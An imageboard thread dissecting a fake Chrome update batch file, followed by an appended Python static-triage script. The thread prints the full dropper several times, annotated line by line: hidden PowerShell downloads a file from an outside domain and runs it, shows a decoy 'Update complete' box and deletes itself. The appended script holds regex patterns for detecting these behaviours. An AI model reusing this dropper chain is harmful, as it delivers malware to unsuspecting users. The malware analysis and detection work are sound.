So did anyone try finding out what chrome-update.bat does in sandbox/VM?
Open it in a fucking text editor, retard.
Please anon don't be this retarded don't set a standard
>>55706937
Well then explain what it does
@echo off
echo a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe';(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0
>>55707099
Downloads a .DAT file and then runs it you fucking moron. It gives you a nice little window saying update complete when the .DAT is finished running....it even tells you the site it downloads from
>>55707099
Why are you even trying to analyze malware if you can't understand this code?
>>55707099
@echo off
echo a=new ActiveXObject('Wscript.Shell'); ' var new object for "explorer access" (run an exe, change regedit, open folders, etc.)
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe'; ' exe powershell to create file
(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d); 'calling to said download file
Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); 'exe said downloaded file
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); 'fake popup addressing "update"
>"%temp%\install_flash.js" 'file from downloaded file
start /min "" wscript.exe "%temp%\install_flash.js" 'exe newly downloaded file from "1eb50823ee917ba6651ef6f1ca977bcb.exe"
DEL "%~f0 'erase tracks
>>55707243
@echo off
Turn off output.
echo a=new ActiveXObject('Wscript.Shell');
var new object for "explorer access" (run an exe, change regedit, open folders, etc.)
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe';
exe powershell to create null file
(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d);
calling to dl file to "fill" the new null file
Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
exe said downloaded file
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
Popup addressing an "update"
>"%temp%\install_flash.js"
file from downloaded file
start /min "" wscript.exe "%temp%\install_flash.js"
exe newly downloaded file from "1eb50823ee917ba6651ef6f1ca977bcb.exe"
DEL "%~f0
erase tracks
>>55707328
You missed a code tag
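
Added example, not part of the thread: a static triage sketch in Python that flags the behaviours the posts above describe (script dropped to %temp%, hidden PowerShell, WebClient download followed by Start-Process, decoy message box, self-delete) by reading the file as text, never running it. The rule names, the `triage` and `download_urls` functions, and the sample with its `example.invalid` URL are constructed for illustration.

```python
import re

# One case-insensitive regex per behaviour in the chain discussed above.
RULES = {
    "script_written_to_temp": r'>\s*"?%temp%\\[^"\s]+\.(?:js|vbs|jse|wsf)\b',
    "wscript_launch": r'\b[wc]script(?:\.exe)?\s+"?%temp%',
    "activex_shell": r"ActiveXObject\(\W*WScript\.Shell",
    "hidden_powershell": r"powershell\b.*?-w\w*\s+hidden",
    "webclient_download": r"Net\.WebClient\W*DownloadFile",
    "runs_downloaded_file": r"Start-Process\s+\$\w+",
    "decoy_messagebox": r"messagebox\]::show",
    "self_delete": r'\bdel\s+"?%~f0',
}

def download_urls(text):
    """Return DownloadFile() targets, normalised and re-defanged for reporting."""
    out = []
    for raw in re.findall(r"DownloadFile\(\s*['\"]([^'\"]+)['\"]", text, re.I):
        # Undo the spacing / [.] / hxxp defanging people use when posting samples.
        url = re.sub(r"\s+", "", raw).replace("[.]", ".")
        url = re.sub(r"^hxxp", "http", url, flags=re.I)
        # Emit a defanged form so the report is never clickable.
        out.append(url.replace("http", "hxxp", 1).replace(".", "[.]"))
    return out

def triage(text):
    """Match every rule against the script text; nothing is executed."""
    hits = [name for name, rx in RULES.items() if re.search(rx, text, re.I)]
    # Download followed by execution is the core of a dropper.
    chain = {"webclient_download", "runs_downloaded_file"} <= set(hits)
    return {"hits": hits, "download_and_execute": chain, "urls": download_urls(text)}

# Constructed sample modelled on the thread's script; file name and URL are placeholders.
SAMPLE = r'''@echo off
echo a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\placeholder.exe';(New-Object System.Net.WebClient).DownloadFile('https: // updates . example . invalid/17/payload.dat',$d);Start-Process $d;[system.windows.forms.messagebox]::show('Update complete.','Information')",0,false); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0
'''

if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["hits"], report["download_and_execute"], report["urls"])
```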